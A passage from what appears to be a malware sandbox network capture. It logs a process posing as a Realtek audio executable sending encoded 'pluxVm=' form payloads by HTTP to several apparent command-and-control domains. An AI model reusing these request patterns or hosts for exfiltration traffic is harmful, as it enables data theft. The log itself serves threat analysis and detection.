63          192.168.11.20  49822        84.32.84.32     80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp  Bytes transferred  Direction  Data
Dec 3, 2024 14:55:34.144407988 CET  697  OUT  POST /073p/ HTTP/1.1
Host: www.sido247.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.sido247.pro
Referer: http://www.sido247.pro/073p/
Content-Length: 223
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
64          192.168.11.20  49823        84.32.84.32     80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp  Bytes transferred  Direction  Data
Dec 3, 2024 14:55:36.878411055 CET  5156  OUT  POST /073p/ HTTP/1.1
Host: www.sido247.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.sido247.pro
Referer: http://www.sido247.pro/073p/
Content-Length: 7371
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:36.878499985 CET  2690  OUT


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
65          192.168.11.20  49824        84.32.84.32     80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp  Bytes transferred  Direction  Data
Dec 3, 2024 14:55:39.610806942 CET  418  OUT  GET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1
Host: www.sido247.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:39.822619915 CET  1289  IN  HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 13:55:39 GMT
Content-Type: text/html
Content-Length: 9973
Connection: close
Vary: Accept-Encoding
Server: hcdn
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: 4bb15f49de0b4477064de4166dc0609e-asc-edge4
Expires: Tue, 03 Dec 2024 13:55:38 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.11.20 | 49825 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:45.003871918 CET | 680 | OUT | POST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiOb7PXuyCNdNMUAy6Hj2DhfKj0DYoft8tYrHFuJu19mefKhOVpKgZnXgbZFivH28v4evdt0eyTVzbAtsuViWVvNcdqsBhMenr8/foMvreNCxfkjRd3vJNkXjsGccIQzdOZ7iU4gE+WijhpLT7lqLVhCYdx5FxL2UDeFLyc/6QfGeHYkNy6rgAMg==
Dec 3, 2024 14:55:45.176934958 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:45 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.11.20 | 49826 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:47.706141949 CET | 700 | OUT | POST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4ffotbPDFvIu1+mefBBOqjqgCnWduZFuvH24v4f/duDy1SFzdZdssbCWVvNcdqsVLMe/r8PvoOKfZRSxc1jRdm/IlkXi5GZEyQxVOZ+eU4xE9YijntLSNqZiFsSsV3Kx2CkA8fTGoBNO0cVC1cU0a4phbRnWWqB7eDno1PMYK0i1mxE8=
Dec 3, 2024 14:55:47.878542900 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:47 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.11.20 | 49827 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:50.410233021 CET | 2578 | OUT | POST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:50.586595058 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:50 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.20 | 49828 | 209.74.79.42 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:53.110161066 CET | 419 | OUT | GET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:53.283241034 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:53 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49829 | 208.91.197.27 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:58.440012932 CET | 698 | OUT | POST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuP43355BUrkfMBV+iL7U3TNiNVkfgWZuJp9rDZO5KAamvwi6YqRL8Ajmq9T07O4FNns8i+F1f6YiBJDVIVUDD5Rg5sNX7ZTJpx9cPQ+sUIfed3SRS+0wYAJFnizfykOzVWz0Rkv1YkeGqhy7Fpv0WZ7V3pzFh2gs989F0c7UXEtzsS/wL+d26CQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49830 | 208.91.197.27 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:01.111413956 CET | 718 | OUT | POST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuOZH37YBUjkfPN1+iZ7UzTNmNVlrwWv+JpZvDaLZKBamvoy6duRKRAjqi9SI7O4RNnuUiimdc7IiHBjVKIEDD5Rg5sNDCZXdpxssPCvsLF/ec2SRS60wUAJFRi3eVkNLVWxsRn6ZbqeGsvS625+RzVOJDohhMwTkG5rIuBJgzH+veWPJj8f3hfeM96F9mmI+qaVUU/4ujEmc=


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.20 | 49831 | 208.91.197.27 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:03.782567978 CET | 2440 | OUT | POST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuOZH37YBUjkfPN1+iZ7UzTNmNVlrwWv2JuqnDaqZKCamvhS6cuRLTAgam9SErO7pNotsiyThcwIiHNDVHVUCZ5Rw9sNTCZXdpxv0PSOsLD/ed3SRe+0xBANRBi3Kvl8rVXR8RrsNbieGuoS6u5+tgVPhloglmwQUG4t1nQNsQdIXeWcFa6v/mYMxFqlELi435FXU07K6rfG7oT7xGQUGIvqxNLFvOCO7kS2cnuOJfNXrjuGtCw0lCjGrOzlJ/BrGHnJlS21fDD35Et7bAnq5iiWTIqO6aIxBR9Pobol24Yh/che/q65WcbMtVhuLD8bXg25KQJXxtnPUNf8pbp5CfqkGMV19Wx2DhbafigfPi8AtD+llVsEDAazN8lFXxaU0P8MQ/fOXIYZ1Y9KFdvl2B4csLuBdNXnVUajmDPXg7w52QwYGDtciwCqeBOiG3cUya1ebEqKTnAnR8H7rUMfFTf010AuovWMipkb+KcxnsIshj5V1a1auMoG7Awx7Sdo7a2mV36l2H89SKsh/M7hvVHwug3JUYXDiSBote3m5WElRHJM/gUUPNevWD7jd6PpzqGKSeQwFZBbCK1PvJkpOijXAaAYmQVkTRKVuyPmtOqP1c/r86cFaoMIzPSQNlY52hN2R9UF746ow/9cGHB7gszD7RVlAV9xsUtQrERKOIotMvQAHeYmsp6qLK83bCXnwgJQbpHbehpaGhZ7l04/QQsegaX/1+aDIexqdQ6ZKCWxpgTuC1iEaWXAjQxNbQsIrlj6OFYewCJ8Jf/nzRzmetg/JohXeZ5fh31DrbW0mH+GPhyCwifrETZQv6Ab8Y7PIidOfAmBeM40ulJ8NggIGf9q/B9ubK5j4H+PWtkCwtWBH2/jpBROyC3xgCNBvhjVPFLHkpsIHyyymJIoMR4B9C2JBc0uzHYCz37IZXdg0e60CG6fZuMBKGm/6wYDLLLrcIOG36c2B13oCeT6Y/uvzgsjjbOP+WVji0r [TRUNCATED]
Dec 3, 2024 14:56:03.782618046 CET | 5427 | OUT
                                                                                                                                                                                                                                Data Ascii: 1bkt3ixmHKqV1dO9yg00RPUXHZWwAwFg/ed371fkm7q0IG911S9cZX6rTKK2ZbQsxXP3b7a6wk4kZE/xmgXxYGLj6vYTo0KLDk/nWWWak5UnMEjzStjeLJfxODAKWVQgtsATeT9Bcdr+ezrDLEPmY/VP1zPqBBqElEZZxOknlLQR/qR8P+5XvHphG+c6S8Eseeg2JIyiKOOYv54xKlHe0/m+03moEcETbRWuIp2jZHle7VDTV38


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.11.20 | 49832 | 208.91.197.27 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:06.454502106 CET | 425 | OUT | GET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:56:07.112541914 CET | 999 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:06 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                                Set-Cookie: vsid=901vr480779766631084573; expires=Sun, 02-Dec-2029 13:56:06 GMT; Max-Age=157680000; path=/; domain=www.epicurecooks.world; HttpOnly
                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Qc4AuhigFg8r2P44Ahsh8bwNmEM1XOJ/2JxY7rqUyl9lnNqfVsEL9tG1PBe14SfEyJewSt5/6EqiUIq8XQ0z/A==
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.11.20 | 49833 | 89.31.143.90 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:12.601114035 CET | 677 | OUT | POST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxEM4qryvsR1pmMrdJr2q1czzfBlQKUfwz39bzj8e5FZM5PKGkzhRK13tkzQnQQfgNLBHGAXGRU8uIPiYsyVOR/NNUOpoHl6uihO6pa9rEe2fGl1otvLu/AG6KKmAbTmStiqtIPEio/WnpjEUexF1ixwrzOHko3sCk9JrjDKgY4EjkDchceYnCoQ==
Dec 3, 2024 14:56:12.795176983 CET | 333 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.11.20 | 49834 | 89.31.143.90 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:15.326878071 CET | 697 | OUT | POST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxFpoqnzvsUVphDLdJyGq5cz/fBn9BUpIz0ZLzi5q5L5M5HqGb3hQG13hszUnQQZMNLB3GAgaSGcuGWSYi91OR/NNUOp85l62ih+Kpacq2d2e0olotrLv0AG6SKiZ0TgWtivpIPWKrwWnrnEVs/Xds1ib6PU8T2uDbx/m5e4U87X/WHsY0camZ1XajUjAx6esv69fiGmhY/rA=
Dec 3, 2024 14:56:15.527430058 CET | 333 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:15 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.11.20 | 49835 | 89.31.143.90 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:18.061311960 CET | 2578 | OUT | POST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:56:18.262478113 CET | 333 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.11.20 | 49836 | 89.31.143.90 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:20.785655975 CET | 418 | OUT | GET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:56:20.978429079 CET | 159 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:20 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Data Raw: 31 39 65 30 0d 0a
                                                                                                                                                                                                                                Data Ascii: 19e0
Dec 3, 2024 14:56:20.978614092 CET | 1289 | IN
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
Dec 3, 2024 14:56:20.979083061 CET | 1289 | IN
                                                                                                                                                                                                                                Data Ascii: bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem <a href="ht
Dec 3, 2024 14:56:20.979120016 CET | 186 | IN
                                                                                                                                                                                                                                Data Ascii: enschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.11.20 | 49837 | 8.136.96.106 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:26.376046896 CET | 689 | OUT | POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
